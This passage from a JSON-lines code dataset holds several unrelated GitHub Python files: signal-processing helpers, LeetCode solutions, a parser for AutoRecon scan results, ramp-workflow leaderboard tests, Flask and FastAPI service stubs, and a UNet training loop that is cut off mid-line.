burmese_numerals)\n","repo_name":"kostik/django_quiz_written","sub_path":"generator/templatetags/myanmar.py","file_name":"myanmar.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11510012353","text":"import numpy as np\r\n\r\nT = 0.01\r\n\r\n# 数值微分-加速度\r\ndef acceleration(list_v):\r\n a = []\r\n for i in range(len(list_v)):\r\n if i == 0:\r\n a.append(list_v[0])\r\n else:\r\n a.append(list_v[i] - list_v[i-1])\r\n return a\r\n\r\n# 数值积分-位移\r\ndef distance(list_v):\r\n d = []\r\n for i in range(len(list_v)):\r\n if i == 0:\r\n d.append(0.0)\r\n else:\r\n d.append(d[i-1] + (list_v[i] + list_v[i-1])/2*T)\r\n return d\r\n\r\n# 十次多项式拟合去势,差分,归一化\r\ndef chafen_qushi_guiyihua(ori_list):\r\n # 去势\r\n a = np.polyfit(range(len(ori_list)), ori_list[:], 10) # 用10次多项式拟合x,y数组\r\n b = np.poly1d(a) # 拟合完之后用这个函数来生成多项式对象\r\n c = b(range(len(ori_list))) # 生成多项式对象之后,就是获取x在这个多项式处的值\r\n qushi = [(ori_list[i] - c[i]) for i in range(len(ori_list))]\r\n # 差分\r\n cf = []\r\n for i in range(len(ori_list)):\r\n if i == len(ori_list) - 1:\r\n cf.append(ori_list[i] - c[i])\r\n else:\r\n cf.append((ori_list[i + 1] - c[i + 1]) - (ori_list[i] - c[i]))\r\n # 归一化\r\n mean = np.mean(np.array(cf))\r\n std = np.std(np.array(cf), ddof=1)\r\n nor = []\r\n for i in range(len(cf)):\r\n nor.append((cf[i] - mean) / std)\r\n return nor\r\n\r\n\r\n# 十次多项式拟合去势,归一化\r\ndef qushi10_guiyihua(ori_list):\r\n # 去势\r\n a = np.polyfit(range(len(ori_list)), ori_list[:], 10) # 用10次多项式拟合x,y数组\r\n b = np.poly1d(a) # 拟合完之后用这个函数来生成多项式对象\r\n c = b(range(len(ori_list))) # 生成多项式对象之后,就是获取x在这个多项式处的值\r\n qushi = [(ori_list[i] - c[i]) for i in range(len(ori_list))]\r\n # 归一化\r\n mean = np.mean(np.array(qushi))\r\n std = np.std(np.array(qushi), ddof=1)\r\n nor = []\r\n for i in range(len(qushi)):\r\n nor.append((qushi[i] - mean) / std)\r\n return nor\r\n\r\n\r\n# 均值去势,归一化\r\ndef qushi_mean_guiyihua(ori_list):\r\n # 去势\r\n mean = np.mean(np.array(ori_list))\r\n qushi = [(ori_list[i] - mean) for i in range(len(ori_list))]\r\n # 归一化\r\n mean = np.mean(np.array(qushi))\r\n std = np.std(np.array(qushi), ddof=1)\r\n nor = []\r\n for i in range(len(qushi)):\r\n nor.append((qushi[i] - mean) / std)\r\n return nor\r\n\r\n\r\n# 均值去势,scalesize\r\ndef qushi_mean_scalesize(ori_list):\r\n # 去势\r\n mean = np.mean(np.array(ori_list))\r\n qushi = [(ori_list[i] - mean) for i in range(len(ori_list))]\r\n # scalesize\r\n scalesize = 1e-5\r\n scale = [(qushi[i] * scalesize) for i in range(len(ori_list))]\r\n return scale\r\n\r\n\r\ndef detrend_normalization_max(ori_list):\r\n # 去势\r\n a = np.polyfit(range(len(ori_list)), ori_list[:], 10) # 用10次多项式拟合x,y数组\r\n b = np.poly1d(a) # 拟合完之后用这个函数来生成多项式对象\r\n c = b(range(len(ori_list))) # 生成多项式对象之后,就是获取x在这个多项式处的值\r\n qushi = [(ori_list[i] - c[i]) for i in range(len(ori_list))]\r\n # 归一化——最大值\r\n max_value = max([abs(qushi[i]) for i in range(len(qushi))])\r\n nor = [(qushi[i] / max_value) for i in range(len(qushi))]\r\n return nor","repo_name":"chf790301/TNCNN","sub_path":"waveforms_processing.py","file_name":"waveforms_processing.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2826872585","text":"import string\n\nclass Solution:\n def uniqueMorseRepresentations(self, words: List[str]) -> int:\n unique = set()\n morse = 
[\".-\",\"-...\",\"-.-.\",\"-..\",\".\",\"..-.\",\"--.\",\"....\",\"..\",\".---\",\"-.-\",\".-..\",\"--\",\"-.\",\"---\",\".--.\",\"--.-\",\".-.\",\"...\",\"-\",\"..-\",\"...-\",\".--\",\"-..-\",\n \"-.--\",\"--..\"]\n letters = list(string.ascii_lowercase)\n for word in words:\n transform = ''\n for s in word:\n transform = transform + morse[letters.index(s)]\n unique.add(transform)\n # print(letters.index('g'))\n return len(unique)","repo_name":"manjurulhoque/problem-solving","sub_path":"Leetcode/unique-morse-code-words.py","file_name":"unique-morse-code-words.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"8397332749","text":"from jutsu.logger import logging # noqa\nfrom jutsu.config import Config, get_version # noqa\nfrom jutsu.core import ( # noqa\n Sedex,\n filters,\n Message,\n get_collection,\n pool\n)\n\nsedex = Sedex() # sedex is the client name\n","repo_name":"ashwinstr/sedex-dedex","sub_path":"jutsu/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12134576550","text":"from typing import List\nclass Solution:\n def containsDuplicate(self, nums: List[int]) -> bool:\n track = {}\n for item in nums:\n if item in track:\n return True\n track[item] = True\n return False\n\nprint(Solution().containsDuplicate([1,2,3,4,1]))","repo_name":"sakshampuri/Leetcode","sub_path":"2. contains-duplicate.py","file_name":"2. contains-duplicate.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42739091412","text":"import os\nimport re\nimport logging\n\n\nlogging.basicConfig(level=logging.DEBUG)\n\ndef checks():\n # Checking to see if the expected directories are found\n logging.debug(\"Checking directories for files\")\n reportDir = os.listdir(\"report\")\n exploitDir = os.listdir(\"exploit\")\n lootDir = os.listdir(\"loot\")\n scansDir = os.listdir(\"scans\")\n\n # Print raw ls\n logging.debug(\"\\n\\nReport: {}\\nExploit: {}\\nLoot: {}\\nScans: {}\".format(reportDir, exploitDir, lootDir, scansDir))\n\n\n if reportDir:\n logging.info(\"Report has content\")\n logging.info(\"Please note, there aren't any command assosiated with this folder yet\")\n else:\n pass\n\n if exploitDir:\n logging.info(\"Exploit has content\")\n logging.info(\"Please note, there aren't any command assosiated with this folder yet\")\n else:\n pass\n\n if lootDir:\n logging.info(\"Loot has content\")\n logging.info(\"Please note, there aren't any command assosiated with this folder yet\")\n else:\n pass\n\n if scansDir:\n logging.info(\"Scans has content\")\n scans(scansDir)\n else:\n pass\n\ndef scans(scansDir):\n logging.info(\"Entering scans directory\")\n logging.debug(scansDir)\n \n # Variables for information\n versionsAll = {}\n feroxbusterAll = {}\n commentAll = []\n robot = False\n\n if \"_full_tcp_nmap.txt\" in scansDir:\n print(\"\\n\\n\")\n logging.info(\"Scanning _full_tcp_nmap.txt for versions\\n\")\n f = open(\"scans/_full_tcp_nmap.txt\", \"r\")\n file = f.readlines()\n for line in file:\n # logging.debug(line)\n\n # Grab Port, service running, and version\n versions = re.findall(\"(\\d+)\\/.+?\\s+\\w+\\s+(\\w+)\\s+[a-z-A-Z]+\\s+(.+)\\n\",line)\n if versions:\n # logging.debug(versions)\n versionsAll[versions[0][0]] = 
{\"port\":versions[0][0],\"service\":versions[0][1],\"version\":versions[0][2]}\n logging.debug(versions)\n f.close()\n\n for things in scansDir:\n if \"feroxbuster.txt\" in things:\n print(\"\\n\\n\")\n logging.info(\"Grabbing feroxbuster information\\n\")\n for ferox in scansDir:\n if \"feroxbuster.txt\" in ferox:\n f = open(\"scans/{}\".format(ferox), \"r\")\n file = f.readlines()\n for line in file:\n directory = re.findall(\"(\\d+).+?\\d+\\w+\\s+\\d+\\w+\\s+(http.+)\",line)\n smallDir = re.findall(\".+/(.+)$\",str(directory[0][1]))\n logging.info(\"Directory Found: {}\".format(smallDir[0]))\n logging.info(\"Whole URL: {}\\n\".format(directory[0][1]))\n\n feroxbusterAll[smallDir[0]] = {\"dir\": smallDir[0], \"url\": directory[0][1], \"status_code\":directory[0][0]}\n # print(line)\n f.close()\n else:\n pass\n\n if \"http_index.html\" in things:\n print(\"\\n\\n\")\n logging.info(\"Looking for comments in index.html\\n\")\n for index in scansDir:\n if \"http_index.html\" in index:\n f = open(\"scans/{}\".format(index), \"r\")\n file = f.readlines()\n for line in file:\n comment = re.findall(\"(\\<\\!\\-\\-.+?\\-\\-\\>)\",line)\n if comment:\n commentAll.append(comment)\n print(comment)\n f.close()\n\n\n if \"robots.txt\" in things:\n print(\"\\n\\n\")\n logging.info(\"Looking for robots.txt\\n\")\n for index in scansDir:\n if \"robots.txt\" in index:\n f = open(\"scans/{}\".format(index), \"r\")\n file = f.readlines()\n for line in file:\n comment = re.findall(\"HTTP\\/1\\.\\d{1}\\s+(\\d{3})\",line)\n if comment:\n status = re.findall(\"(40\\d|50\\d)\",comment[0])\n if status:\n logging.info(\"Robots.txt page not found\")\n else:\n logging.info(\"Robots.txt page found. Please check\")\n robot = True\n\n f.close()\n\n\n\n logging.debug(versionsAll)\n logging.debug(feroxbusterAll)\n logging.debug(commentAll)\n logging.debug(\"Robots.txt page found: {}\".format(robot))\n\ndef main():\n print(\"Whats up!\")\n\n curdir = os.listdir()\n if \"report\" in curdir and \"exploit\" in curdir and \"loot\" in curdir and \"scans\" in curdir:\n logging.debug(\"We in it\")\n checks()\n else:\n logging.fatal(\"Please put me in the directory that has AutoRecon's output. I can not find it here.... 
\\nCurrent Location: {}\".format(os.getcwd()))\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"sparky23172/WOPR_and_friends","sub_path":"AutoReconReader/AutoReconReport.py","file_name":"AutoReconReport.py","file_ext":"py","file_size_in_byte":4950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38911549590","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport os\nfrom tempfile import mkdtemp\nfrom shutil import rmtree\nimport pytest\n\nimport pandas as pd\n\nfrom rampwf.utils.command_line import create_ramp_test_submission_parser\nfrom rampwf.utils.command_line import create_ramp_test_notebook_parser\nfrom rampwf.utils.command_line import _get_metrics\nfrom rampwf.utils.command_line import _build_leaderboard_df\nfrom rampwf.utils.command_line import _filter_and_sort_leaderboard_df\nfrom rampwf.utils.command_line import _build_scores_dict\n\n\ndef test_cmd_ramp_test_submission_parser():\n\n # defaults\n parser = create_ramp_test_submission_parser()\n args = parser.parse_args([])\n assert args.ramp_kit_dir == '.'\n assert args.ramp_data_dir == '.'\n assert args.ramp_submission_dir == 'submissions'\n assert args.submission == 'starting_kit'\n\n # specifying keyword args\n parser = create_ramp_test_submission_parser()\n args = parser.parse_args([\n '--ramp_kit_dir', './titanic/', '--ramp_data_dir', './titanic/',\n '--ramp_submission_dir', './titanic', '--submission', 'other'])\n assert args.ramp_kit_dir == './titanic/'\n assert args.ramp_data_dir == './titanic/'\n assert args.ramp_submission_dir == './titanic'\n assert args.submission == 'other'\n\n\ndef test_cmd_ramp_test_notebook_parser():\n\n # defaults\n parser = create_ramp_test_notebook_parser()\n args = parser.parse_args([])\n assert args.ramp_kit_dir == '.'\n\n # specifying keyword args\n parser = create_ramp_test_notebook_parser()\n args = parser.parse_args(['--ramp_kit_dir', './titanic/'])\n assert args.ramp_kit_dir == './titanic/'\n\n\ndef test_cmd_ramp_leaderboard_build_scores_dict():\n with TemporaryDirectory() as tmpdirname:\n # case where 'submissions' folder does not exit\n with pytest.raises(OSError):\n _build_scores_dict(tmpdirname)\n\n # case where 'submissions' folder exists but no scores\n # are available\n\n os.mkdir(os.path.join(tmpdirname, 'submissions'))\n scores = _build_scores_dict(tmpdirname)\n assert len(scores) == 0\n training_output = os.path.join(\n tmpdirname, 'submissions', '{sub}', 'training_output')\n os.makedirs(training_output.format(sub='s1'))\n os.makedirs(training_output.format(sub='s2'))\n scores = _build_scores_dict(tmpdirname)\n assert len(scores) == 0\n\n os.makedirs(os.path.join(training_output, 'fold_0').format(sub='s1'))\n os.makedirs(os.path.join(training_output, 'fold_0').format(sub='s2'))\n\n scores = _build_scores_dict(tmpdirname)\n assert len(scores) == 0\n\n scores_content = [\n \"step,acc,nll\",\n \"train,0.57,1.17\",\n \"valid,0.65,0.52\",\n \"test,0.70,0.80\"\n ]\n f = os.path.join(\n training_output,\n 'fold_0', 'scores.csv').format(sub='s1')\n # case where scores.csv file is empty\n with open(f, 'w') as fd:\n pass\n with pytest.raises(pd.errors.EmptyDataError):\n _build_scores_dict(tmpdirname)\n\n with open(f, 'w') as fd:\n fd.write(scores_content[0] + '\\n')\n\n # case where all steps are missing in the scores.csv file\n with pytest.raises(AssertionError):\n _build_scores_dict(tmpdirname)\n\n # case where some step is missing in the scores.csv file\n with open(f, 'w') as fd:\n 
fd.write(scores_content[0] + '\\n')\n fd.write(scores_content[1] + '\\n')\n with pytest.raises(AssertionError):\n _build_scores_dict(tmpdirname)\n # case where everything is fine in scores.csv file\n with open(f, 'w') as fd:\n fd.write('\\n'.join(scores_content))\n scores = _build_scores_dict(tmpdirname)\n assert len(scores) == 1\n assert list(scores.keys()) == ['s1']\n assert scores['s1'][0]['acc'] == {\n 'train': 0.57, 'valid': 0.65, 'test': 0.7}\n assert scores['s1'][0]['nll'] == {\n 'train': 1.17, 'valid': 0.52, 'test': 0.80}\n # case of two submissions that are ok\n f = os.path.join(\n training_output,\n 'fold_0', 'scores.csv').format(sub='s2')\n with open(f, 'w') as fd:\n fd.write('\\n'.join(scores_content))\n scores = _build_scores_dict(tmpdirname)\n assert len(scores) == 2\n assert set(scores.keys()) == set(['s1', 's2'])\n assert scores['s1'][0]['acc'] == {\n 'train': 0.57, 'valid': 0.65, 'test': 0.7}\n assert scores['s1'][0]['nll'] == {\n 'train': 1.17, 'valid': 0.52, 'test': 0.80}\n assert scores['s2'][0]['acc'] == {\n 'train': 0.57, 'valid': 0.65, 'test': 0.7}\n assert scores['s2'][0]['nll'] == {\n 'train': 1.17, 'valid': 0.52, 'test': 0.80}\n # case of two submissions with inconsistent metrics\n scores1_content = [\n \"step,acc,nll\",\n \"train,0.57,1.17\",\n \"valid,0.65,0.52\",\n \"test,0.70,0.80\"\n ]\n scores2_content = [\n \"step,acc\",\n \"train,0.57\",\n \"valid,0.65\",\n \"test,0.70\"\n ]\n f = os.path.join(\n training_output,\n 'fold_0', 'scores.csv').format(sub='s1')\n with open(f, 'w') as fd:\n fd.write('\\n'.join(scores1_content))\n f = os.path.join(\n training_output,\n 'fold_0', 'scores.csv').format(sub='s2')\n with open(f, 'w') as fd:\n fd.write('\\n'.join(scores2_content))\n with pytest.raises(AssertionError):\n _build_scores_dict(tmpdirname)\n # case of two submissions with inconsistent nb of folds\n os.makedirs(os.path.join(training_output, 'fold_1').format(sub='s1'))\n f = os.path.join(\n training_output,\n 'fold_1', 'scores.csv').format(sub='s1')\n with open(f, 'w') as fd:\n fd.write('\\n'.join(scores1_content))\n\n f = os.path.join(\n training_output,\n 'fold_0', 'scores.csv').format(sub='s2')\n with open(f, 'w') as fd:\n fd.write('\\n'.join(scores1_content))\n with pytest.raises(AssertionError):\n _build_scores_dict(tmpdirname)\n # case of two submissions, with two folds that are fine\n os.makedirs(os.path.join(training_output, 'fold_1').format(sub='s2'))\n\n s1f0 = [\n \"step,acc,nll\",\n \"train,0.1,1\",\n \"valid,0.2,2\",\n \"test,0.3,3\"\n ]\n s1f1 = [\n \"step,acc,nll\",\n \"train,0.4,4\",\n \"valid,0.5,5\",\n \"test,0.6,6\"\n ]\n s2f0 = [\n \"step,acc,nll\",\n \"train,0.7,7\",\n \"valid,0.8,8\",\n \"test,0.9,9\"\n ]\n s2f1 = [\n \"step,acc,nll\",\n \"train,0.1,1\",\n \"valid,0.2,2\",\n \"test,0.3,3\"\n ]\n scs = {'s1': {'fold_0': s1f0, 'fold_1': s1f1},\n 's2': {'fold_0': s2f0, 'fold_1': s2f1}}\n for sub in ('s1', 's2'):\n for fold in ('fold_0', 'fold_1'):\n f = os.path.join(training_output, fold, 'scores.csv').format(\n sub=sub)\n with open(f, 'w') as fd:\n fd.write('\\n'.join(scs[sub][fold]))\n scores = _build_scores_dict(tmpdirname)\n expected_scores = {\n 's1': {\n 0: {\n 'acc': {'train': 0.1, 'valid': 0.2, 'test': 0.3},\n 'nll': {'train': 1, 'valid': 2, 'test': 3},\n },\n 1: {\n 'acc': {'train': 0.4, 'valid': 0.5, 'test': 0.6},\n 'nll': {'train': 4, 'valid': 5, 'test': 6},\n }\n },\n 's2': {\n 0: {\n 'acc': {'train': 0.7, 'valid': 0.8, 'test': 0.9},\n 'nll': {'train': 7, 'valid': 8, 'test': 9},\n },\n 1: {\n 'acc': {'train': 0.1, 'valid': 0.2, 
'test': 0.3},\n 'nll': {'train': 1, 'valid': 2, 'test': 3},\n },\n }\n }\n assert scores == expected_scores\n\n\nclass TemporaryDirectory(object):\n\n def __enter__(self):\n self.tmpdirname = mkdtemp()\n return self.tmpdirname\n\n def __exit__(self, *exc):\n rmtree(self.tmpdirname)\n\n\ndef test_cmd_ramp_leaderboard_build_leaderboard_df():\n scores_dict = {\n 'submission1': {\n 0: {\n 'acc': {'train': 0.7, 'valid': 0.3, 'test': 0.1},\n 'nll': {'train': 1.3, 'valid': 1.4, 'test': 1.5},\n },\n 1: {\n 'acc': {'train': 0.8, 'valid': 0.5, 'test': 0.4},\n 'nll': {'train': 1.2, 'valid': 1.6, 'test': 1.6},\n }\n },\n 'submission2': {\n 0: {\n 'acc': {'train': 0.4, 'valid': 0.7, 'test': 0.2},\n 'nll': {'train': 1.1, 'valid': 1.9, 'test': 1.2},\n },\n 1: {\n 'acc': {'train': 0.3, 'valid': 0.3, 'test': 0.4},\n 'nll': {'train': 1.2, 'valid': 1.0, 'test': 1.1},\n },\n }\n }\n\n leaderboard_df = _build_leaderboard_df(scores_dict, precision=2)\n assert set(leaderboard_df.columns) == set([\n 'submission',\n 'train_acc', 'valid_acc', 'test_acc',\n 'train_acc_mean', 'valid_acc_mean', 'test_acc_mean',\n 'train_acc_std', 'valid_acc_std', 'test_acc_std',\n\n 'train_nll', 'valid_nll', 'test_nll',\n 'train_nll_mean', 'valid_nll_mean', 'test_nll_mean',\n 'train_nll_std', 'valid_nll_std', 'test_nll_std',\n ])\n assert (set(leaderboard_df['submission']) ==\n set(['submission1', 'submission2']))\n\n d = leaderboard_df.set_index('submission').to_dict(orient='index')\n assert d['submission1']['valid_acc'] == '0.40 ± 0.100'\n assert d['submission1']['test_acc'] == '0.25 ± 0.150'\n assert d['submission1']['train_nll'] == '1.25 ± 0.050'\n assert d['submission1']['valid_nll'] == '1.50 ± 0.100'\n assert d['submission1']['test_nll'] == '1.55 ± 0.050'\n assert d['submission1']['train_acc_mean'] == '0.75'\n assert d['submission1']['train_acc_std'] == '0.050'\n assert d['submission1']['valid_acc_mean'] == '0.40'\n assert d['submission1']['valid_acc_std'] == '0.100'\n assert d['submission1']['test_acc_mean'] == '0.25'\n assert d['submission1']['test_acc_std'] == '0.150'\n assert d['submission1']['train_nll_mean'] == '1.25'\n assert d['submission1']['train_nll_std'] == '0.050'\n assert d['submission1']['valid_nll_mean'] == '1.50'\n assert d['submission1']['valid_nll_std'] == '0.100'\n assert d['submission1']['test_nll_mean'] == '1.55'\n assert d['submission1']['test_nll_std'] == '0.050'\n assert d['submission2']['train_acc'] == '0.35 ± 0.050'\n assert d['submission2']['valid_acc'] == '0.50 ± 0.200'\n assert d['submission2']['test_acc'] == '0.30 ± 0.100'\n assert d['submission2']['train_nll'] == '1.15 ± 0.050'\n assert d['submission2']['valid_nll'] == '1.45 ± 0.450'\n assert d['submission2']['test_nll'] == '1.15 ± 0.050'\n assert d['submission2']['train_acc_mean'] == '0.35'\n assert d['submission2']['train_acc_std'] == '0.050'\n assert d['submission2']['valid_acc_mean'] == '0.50'\n assert d['submission2']['valid_acc_std'] == '0.200'\n assert d['submission2']['test_acc_mean'] == '0.30'\n assert d['submission2']['test_acc_std'] == '0.100'\n assert d['submission2']['train_nll_mean'] == '1.15'\n assert d['submission2']['train_nll_std'] == '0.050'\n assert d['submission2']['valid_nll_mean'] == '1.45'\n assert d['submission2']['valid_nll_std'] == '0.450'\n assert d['submission2']['test_nll_mean'] == '1.15'\n assert d['submission2']['test_nll_std'] == '0.050'\n\n\ndef test_cmd_ramp_leaderboard_filter_sort_leaderboard_df():\n scores_dict = {\n 'submission1': {\n 0: {\n 'acc': {'train': 0.7, 'valid': 0.3, 'test': 0.1},\n 'nll': {'train': 
1.3, 'valid': 1.4, 'test': 1.5},\n },\n 1: {\n 'acc': {'train': 0.8, 'valid': 0.5, 'test': 0.4},\n 'nll': {'train': 1.2, 'valid': 1.6, 'test': 1.6},\n }\n },\n 'submission2': {\n 0: {\n 'acc': {'train': 0.4, 'valid': 0.7, 'test': 0.2},\n 'nll': {'train': 1.1, 'valid': 1.9, 'test': 1.2},\n },\n 1: {\n 'acc': {'train': 0.3, 'valid': 0.3, 'test': 0.4},\n 'nll': {'train': 1.2, 'valid': 1.0, 'test': 1.1},\n },\n }\n }\n df = _build_leaderboard_df(scores_dict)\n # by default use train_metric/valid_metric/test_metric\n # of the metric first in alphabetical order ('acc' here)\n df_ = _filter_and_sort_leaderboard_df(\n df,\n cols=None,\n metric=None,\n sort_by=None)\n assert df_.columns.tolist() == [\n 'submission', 'train_acc', 'valid_acc', 'test_acc']\n # non existent column\n with pytest.raises(ValueError):\n df_ = _filter_and_sort_leaderboard_df(\n df,\n cols=['abc'],\n metric=None,\n sort_by=None)\n # no columns\n df_ = _filter_and_sort_leaderboard_df(\n df,\n cols=[],\n metric=None,\n sort_by=None)\n assert df_.columns.tolist() == ['submission']\n\n # some cols\n df_ = _filter_and_sort_leaderboard_df(\n df,\n cols=['train_nll', 'valid_acc'],\n metric=None,\n sort_by=None)\n assert df_.columns.tolist() == ['submission', 'train_nll', 'valid_acc']\n df_ = _filter_and_sort_leaderboard_df(\n df,\n cols=['valid_acc', 'train_nll'],\n metric=None,\n sort_by=None)\n assert df_.columns.tolist() == ['submission', 'valid_acc', 'train_nll']\n # giving both a metric and cols\n df_ = _filter_and_sort_leaderboard_df(\n df,\n cols=['valid_acc', 'train_nll'],\n metric='acc',\n sort_by=None)\n assert df_ is None\n\n # non existent metric\n with pytest.raises(ValueError):\n df_ = _filter_and_sort_leaderboard_df(\n df,\n cols=None,\n metric='accc',\n sort_by=None)\n # giving metric\n df_ = _filter_and_sort_leaderboard_df(\n df,\n cols=None,\n metric='nll',\n sort_by=None)\n assert df_.columns.tolist() == [\n 'submission', 'train_nll', 'valid_nll', 'test_nll']\n # sorting by non existent col\n with pytest.raises(ValueError):\n df_ = _filter_and_sort_leaderboard_df(\n df,\n cols=None,\n metric=None,\n sort_by=['abc'])\n # sorting by col\n df_ = _filter_and_sort_leaderboard_df(\n df,\n cols=None,\n metric=None,\n sort_by=['test_nll_mean'],\n asc=True)\n assert df_['submission'].tolist() == ['submission2', 'submission1']\n df_ = _filter_and_sort_leaderboard_df(\n df,\n cols=None,\n metric=None,\n sort_by=['test_nll_mean'],\n asc=False)\n assert df_['submission'].tolist() == ['submission1', 'submission2']\n\n df_ = _filter_and_sort_leaderboard_df(\n df,\n cols=None,\n metric=None,\n sort_by=['train_acc_mean'],\n asc=False)\n assert df_['submission'].tolist() == ['submission1', 'submission2']\n\n\ndef test_cmd_ramp_leaderboard_get_metrics():\n assert _get_metrics(_build_leaderboard_df({})) == []\n scores_dict = {\n 'submission1': {\n 0: {\n 'acc': {'train': 0.7, 'valid': 0.3, 'test': 0.1},\n 'nll': {'train': 1.3, 'valid': 1.4, 'test': 1.5},\n },\n 1: {\n 'acc': {'train': 0.8, 'valid': 0.5, 'test': 0.4},\n 'nll': {'train': 1.2, 'valid': 1.6, 'test': 1.6},\n }\n },\n 'submission2': {\n 0: {\n 'acc': {'train': 0.4, 'valid': 0.7, 'test': 0.2},\n 'nll': {'train': 1.1, 'valid': 1.9, 'test': 1.2},\n },\n 1: {\n 'acc': {'train': 0.3, 'valid': 0.3, 'test': 0.4},\n 'nll': {'train': 1.2, 'valid': 1.0, 'test': 1.1},\n },\n }\n }\n df = _build_leaderboard_df(scores_dict)\n assert set(_get_metrics(df)) == set(['acc', 
'nll'])\n","repo_name":"gregoire-colin/ramp_workflow","sub_path":"rampwf/utils/tests/test_command_line.py","file_name":"test_command_line.py","file_ext":"py","file_size_in_byte":16402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32448558187","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\"\"\"\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\n\nimport logging\nfrom json import dumps\n\nfrom flask import request\n\nlogger = logging.getLogger('plutil.http.s')\n\n\ndef define_common_routes(plugin, app, server):\n \"\"\" Some routes are always defined. \"\"\"\n\n @app.route('/', methods=['GET', 'POST'])\n def route_index():\n logger.debug(\"Server reached on root path\")\n\n the_args = request.args\n for arg in the_args:\n logger.debug(\" - argument %s: %s\", (arg, the_args[arg]))\n\n return dumps({\n 'status': 'OK',\n 'result': the_args\n })\n\n @app.route('/shut_me_down_used_for_restarts', methods=['POST'])\n def route_shutdown():\n func = request.environ.get('werkzeug.server.shutdown')\n if func is None:\n raise RuntimeError('Not running with the Werkzeug Server')\n func()\n return dumps({\n 'status': 'OK',\n 'result': \"Shutting down...\"\n })\n\n @app.route('/result', methods=['GET', 'POST'])\n def route_result():\n logger.debug(\"We're being asked about a result\")\n\n try:\n message_id = str(request.args['id'])\n with server.messages_lock:\n if message_id in server.messages:\n logger.debug(\"message %r found in queue\", message_id)\n message = server.messages[message_id]\n del server.messages[message_id]\n result_type = message.result_type\n result_data = message.result_data\n else:\n logger.debug(\"message %r NOT found in queue\", message_id)\n result_type = 'NotFound'\n result_data = 'Result may not be ready or it ' \\\n 'might have expired'\n except Exception:\n result_data = 'Exception in server while attempting to reply'\n result_type = 'Error'\n logger.error(result_data, exc_info=True)\n\n return dumps({\n 'status': result_type,\n 'result': result_data\n })\n","repo_name":"pyqgis/plutil","sub_path":"qgis_plutil/http_server/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41990797781","text":"import fastapi_jsonrpc as jsonrpc\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom loguru import logger\nfrom app.errors import *\nfrom app.library import Library\n\n# JSON-RPC entrypoint\napi_v1 = jsonrpc.Entrypoint(\"/v1\")\n\n# Server singletons: database, queue and library handler\nqueue = Library(\"redis\")\n# RPC Methods\n\n\n@api_v1.method(errors=[])\ndef allocation() -> dict:\n \"\"\"Get assigned a start for your brick of TMs to compute and submit\"\"\"\n logger.info(\"allocation requested \")\n\n\n@api_v1.method(errors=[])\ndef submission(client: str, start_tm: int, result_map: dict) -> dict:\n \"\"\"Submit your TM results for an allocated compute task\"\"\"\n logger.info(\"submission made for {} \", start_tm)\n\n\n@api_v1.method()\ndef network() -> dict:\n \"\"\"Gets the latest volunteer network information\"\"\"\n results = {\n \"latest_turing_space\": 3,\n \"total_clients\": 112,\n \"automacoin_supply\": 10000,\n \"brick_size\": 500,\n }\n return results\n\n\n# entrypoint: ./api/v1/... 
methods=account, allocation, network\napp = jsonrpc.API()\napp.bind_entrypoint(api_v1)\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n# configure logger session\n@app.on_event(\"startup\")\nasync def startup():\n logger.add(\"file_{time}.log\")\n logger.info(\"Service is Spinning Up\")\n logger.info(\"Starting tape store...\")\n\n\n# Dump the logs if a shutdown is occuring.\n@app.on_event(\"shutdown\")\nasync def shutdown():\n # ideally you'd put this backup in a docker volume, S3 or Grafana-compatible store.\n logger.info(\"Service is Shutting Down\")\n\n\nif __name__ == \"__main__\":\n import uvicorn\n\n uvicorn.run(\"main:app\", host=\"0.0.0.0\", port=5000, debug=True, access_log=False)\n","repo_name":"automacoin/Foreman","sub_path":"src/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"73063780807","text":"from UNetDataset import UNetDataset\nfrom Unet2d import UNet\nfrom torch.utils.data import Dataset, DataLoader\nimport matplotlib.pyplot as plt\nimport torch.nn as nn\nimport torch.optim as optim\nimport smtplib, ssl\n\n# IXI dataset path\nMNI_data_path = '/Users/gabriellakamlish/BrainResection/IXI/IXI_MNI'\nIXI_dataset = UNetDataset(MNI_data_path)\n\ndataloader = DataLoader(IXI_dataset, batch_size=5,shuffle=True, num_workers=0)\n\nneural_net = UNet()\n\ncriterion = nn.MSELoss()\noptimizer = optim.Adam(neural_net.parameters(), lr=0.001)\n\ntraining_iterations = 1\n\nfor epoch in range(training_iterations): # loop over the dataset multiple times\n\n running_loss = 0.0\n for i, data in enumerate(dataloader, 0):\n # get the inputs; data is a list of [inputs, labels]\n inputs, labels = data\n\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward + backward + optimize\n print(inputs.dtype)\n\n inputs = inputs.float()\n print(inputs.dtype)\n outputs = neural_net(inputs)\n print(outputs.dtype)\n loss = criterion(outputs, labels)\n\n loss.backward()\n optimizer.step()\n\n # print statistics\n running_loss += loss.item()\n if i % 5 == 4: # print every 10 mini-batches\n print('[%d, %5d] loss: %.3f' %\n (epoch + 